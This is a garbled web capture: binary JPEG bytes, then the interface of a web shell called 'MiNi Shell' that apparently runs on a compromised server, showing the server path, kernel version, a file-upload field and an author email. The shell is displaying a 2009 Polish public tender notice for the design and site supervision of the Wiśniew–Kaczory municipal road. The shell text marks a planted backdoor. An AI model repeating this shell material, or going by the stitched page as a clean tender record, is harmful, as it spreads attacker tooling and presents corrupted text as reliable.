JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090326/78464-N-2009.html

<p class="kh_header"><b>Wiśniew: Projektowanie drogi gminnej Wiśniew Kaczory wraz z pełnieniem nadzoru inwestorskiego</b><br>
<b>Numer ogłoszenia: 78464 - 2009; data zamieszczenia: 26.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wiśniew , ul. Siedlecka 13, 08-112 Wiśniew, woj. mazowieckie, tel. 0 25 641 73 13, faks 0 25 641 73 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wisniew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Projektowanie drogi gminnej Wiśniew Kaczory wraz z pełnieniem nadzoru inwestorskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Projekt budowlany drogi gminnej Wiśniew Kaczory o nawierzchni bitumicznej łącznej długości 3 660 m wraz z pełnieniem nadzoru inwestorskiego. 
1). Projekt budowlany pn. Budowa drogi gminnej Wiśniew - Kaczory 
Zakres poszczególnych opracowań dokumentacji projektowej:
a)	Projekt budowlany branży drogowej 							- 5 egz.
b)	Projekt organizacji ruchu podczas trwania robót budowlanych				- 3 egz.
c)	Projekt stałej organizacji ruchu								- 3 egz.,
d)	Projekt budowlany przebudowy istniejącej infrastruktury - w przypadku potrzeby			- 5 egz.,
e)	Projekt budowlany odcinka kanalizacji deszczowej w obrębie skrzyżowań z ulicami Sanitariuszek, Batalionów Chłopskich, Północną i Południową,
f)	Specyfikacja techniczna wykonania i odbioru robót budowlanych				- 2 egz.
g)	Przedmiar robót 										- 2 egz.
h)	Kosztorys inwestorski szczegółowy								- 2 egz.,
i)	Wersja elektroniczna całości								- 2 egz.
j)	Aktualizacja kosztorysów zgodnie z obowiązującą ustawą Prawo Zamówień Publicznych	 - 1kpl.
2). Pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją robót budowlanych w pełnym zakresie.

Do obowiązków projektanta należy opracowanie następujących dokumentów wchodzących w skład projektu budowlanego:
a)	wykonanie niezbędnych badań i pomiarów,
b)	opracowanie podkładów mapowych bądź ich aktualizacja w zakresie niezbędnym do opracowania projektów budowlanych,
c)	uzyskanie wypisów z ewidencji gruntów dla działek, na których projektowana będzie inwestycja,
d)	przygotowanie wniosku o wydanie decyzji o lokalizacji inwestycji celu publicznego (w przypadku potrzeby),
e)	przygotowanie wniosku o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia,
f)	raport oddziaływania inwestycji na środowisko (w przypadku potrzeby),
g)	opracowanie operatów wodno-prawnych i przygotowanie wniosków o wydanie pozwoleń wodno-prawnych,
h)	opracowanie informacji BIOZ,
i)	uzyskanie niezbędnych uzgodnień,
j)	uzyskanie pisemnej zgody właścicieli działek, na których będzie realizowana inwestycja,
k)	uzgodnienie lokalizacji zjazdów z właścicielami działek.
Uwaga! Inwestor posiada mapę do celów projektowych dla odcinka drogi od skrzyżowania z drogą krajową Nr 63 do ul. Batalionów Chłopskich sporządzoną w 2007 roku.

I.	Opis wymagań i charakterystyka oraz parametry techniczne w stosunku do przedmiotu zamówienia:
Dokumentacja powinna zawierać wszystkie uzgodnienia i dokumenty niezbędne do uzyskania dokumentów umożliwiających rozpoczęcie robót budowlanych,. W przypadku braku niezbędnych uzgodnień, projektant uzupełni w trybie pilnym części brakujące bez zwiększenia wartości przetargowej zamówienia.
	Kosztorysy inwestorskie powinny być sporządzone zgodnie z aktualnymi obowiązującymi przepisami dla zamówień publicznych - (Rozporządzenie Ministra Infrastruktury z dnia 18.05.2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym Dz.U.04.130.1389).
	Specyfikacje techniczne wykonania i odbioru robót budowlanych należy opracować zgodnie Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r.w sprawie szczegółowego zakresu            i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2004r. Nr. 202 poz. 2072). 
	Zamawiający pokryje koszty opłat związane z uzgodnieniem dokumentacji. Projektant przygotuje niezbędne wnioski i załączniki w celu uzyskania wymaganych uzgodnień.
Założenia (wstępne) do sporządzenia projektu budowlanego: 
a)	szerokość istniejącego pasa drogowego 9,0 m
b)	jezdnia o nawierzchni bitumicznej asfaltowej (5 + 4) cm na podbudowie betonowej i warstwie odsączającej - szerokość 5,5 m,
c)	pobocza nieutwardzone dwustronne - każdy o szerokości 1 m,
d)	zjazdy na drogi i działki przyległe - 1 kpl.,
e)	odwodnienie powierzchniowe - 1 kpl.,
f)	kanalizacja deszczowa w obrębie skrzyżowań z ul. Sanitariuszek, Batalionów Chłopskich, Północną i Południową- 1 kpl.,
g)	przebudowa czterech przepustów drogowych - (dwa na rzece Myrsze i dwa na rowach melioracyjnych),
h)	oznakowanie pionowe i poziome drogi - 1 kpl.
	W trakcie projektowania w/wym drogi należy zastosować materiały dostępne na rynku budowlanym. 
	Powyższe dane stanowią założenia przyjęte przez Inwestora. W trakcie trwania opracowań projektowych projektant uszczegółowi rozwiązania techniczne.
Przy sporządzaniu kosztorysów inwestorskich i przedmiarów robót projektant dokona podziału na części według wskazań Zamawiającego. 
Odbiór opracowanej kompletnej dokumentacji nastąpi po spisaniu protokołu zdawczo - odbiorczego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1, 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest najpóźniej do wyznaczonego terminu składania ofert, tj. do dnia 07.04.2009 r. do godz. 10:00 wnieść wadium w wysokości 2 420,00 zł (słownie: dwa tysiące czterysta dwadzieścia  złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.    O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają    obowiązek posiadania takich uprawnień; 
1.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; 
1.3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
1.4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, 
2.       Opis sposobu dokonania oceny spełnienia warunków: 
2.1.    Potencjał kadrowy.
            Wykonawca wskaże do wykonania niniejszego zamówienia: osoby posiadające uprawnienia budowlane do projektowania i kierowania robotami budowlanymi w specjalności drogowej  wymagane przepisami ustawy z dnia 07 lipca 1994 r. Prawo Budowlane wraz z przynależnością  do Izby Inżynierów Budownictwa
2.2.    Doświadczenie: 
            Wykonawca  wykaże,  że w ciągu ostatnich 3 lat kalendarzowych (licząc od dnia wszczęcia postępowania), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom  stanowiącym przedmiot zamówienia  z podaniem ich wartości, przedmiotu,  daty wykonania i odbiorców,  oraz załączenia  dokumentów potwierdzających, że usługi te zostały wykonane należycie.  W szczególności zamawiający wymaga, aby wykonawca wykonał co najmniej jedną usługę o charakterze i złożoności porównywalnej z  przedmiotem  zamówienia tj. projekt budowlany drogi (ulicy) lub kilku dróg (ulic) ołącznej długości min. 1 km i wartości 40 000 zł.
              
2.3.     Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie        spełniają warunek określony w pkt. 2.1.oraz w pkt 2.2. 

Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. 7 przedmiotowego postępowania oświadczeń i dokumentów, wg. formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1     Na ofertę składają się następujące dokumenty i  załączniki: 
1.1.  Formularz oferty - wypełniony i podpisany przez wykonawcę załącznik nr 1 do oferty
1.2.  Potwierdzenie wpłaty wadium - kserokopia podpisana za zgodność.
2.    W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej  działalności lub czynności oraz nie podlega wykluczeniu art. 24 ustawy Pzp, składa następujące dokumenty:                     
2.1.  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie  do ewidencji  działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru  lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.2.   Pełnomocnictwo do reprezentowania o ile ofertę składa pełnomocnik - załącznik nr 2 
2.3.   Oświadczenie o spełnieniu warunków udziału w postępowaniu - art. 22 ust. 1 ustawy Pzp i nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy Pzp -   załącznik nr 3.
3.      W celu potwierdzenia spełnienia warunków posiadania przez wykonawców niezbędnej wiedzy i   doświadczenia i osobami zdolnymi do wykonywania zamówienia należy złożyć następujące dokumenty lub oświadczenia:
3.1.  Wykaz wykonanych  usług w okresie ostatnich 3 lat kalendarzowych (licząc od dnia wszczęcia postępowania), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu,  dat  wykonania i odbiorców  oraz załączenia  dokumentów potwierdzających, że usługi te zostały wykonane należycie.  W szczególności zamawiający wymaga, aby wykonawca wykonał co najmniej jedną usługę o charakterze i złożoności porównywalnej z  przedmiotem  zamówienia tj. projekt budowlany drogi (ulicy) lub kilku dróg (ulic) o łącznej długości min. 1 km i wartości 40 000 zł. Do wykazu należy dołączyć dokumenty potwierdzające jakość wykonanych usług. Wykaz usług będzie nie ważny bez potwierdzającego dokumentu należytego wykonania usług np. referencji, protokółu końcowego odbioru robót - załącznik Nr 5. 
3.2.  Uprawnienia  osób, które  będą uczestniczyć w wykonaniu zamówienia, posiadające uprawnienia budowlane do projektowania  w specjalności drogowej  wraz z przynależnością do Okręgowej izby Inżynierów Budownictwa.
3.3   Uprawnienia  osób, które będą uczestniczyć w wykonaniu zamówienia, posiadającą uprawnienia budowlane do nadzorowania  robotami budowlanymi w specjalności drogowej i wraz z przynależnością do Okręgowej izby Inżynierów Budownictwa.

            Dopuszcza się osoby posiadające jednocześnie uprawnienia do projektowania i nadzorowania robotami budowlanymi w specjalności drogowej

4.      Wykonawca zamieszkały poza terytorium Rzeczpospolitej polskiej:
4.1.     Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 2.1.. składa dokument lub dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości oraz nie orzeczono wobec niego zakazu ubiegania się o zamówienie. 
4.2.    Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 4.1., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
5.       Zasady składania oferty przez podmioty występujące wspólnie: 
5.1.    Podmioty zobowiązane są do złożenia wraz z ofertą pełnomocnictwa do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
5.2.    Wymagane oświadczenia i dokumenty wskazane w pkt. 2.1., 2.3.  powinny być złożone przez każdy podmiot..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wisniew.e-bip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wiśniew
ul. Siedlecka 13
08-112 Wiśniew
pokój nr 8.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2009 godzina 10:00, miejsce: Urząd Gminy Wiśniew
ul. Siedlecka 13
08-112 Wiśniew
pokój nr 6 sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wszelkiego rodzaju oświadczenia, wnioski, zawiadomienia, informacje itp. Zamawiający i Wykonawcy    przekazują pisemnie lub faksem.
      Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje przekazane za pomocą faksu, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
Osobą uprawnioną do kontaktu z Wykonawcami jest:

Creat By MiNi SheLL
Email: jattceo@gmail.com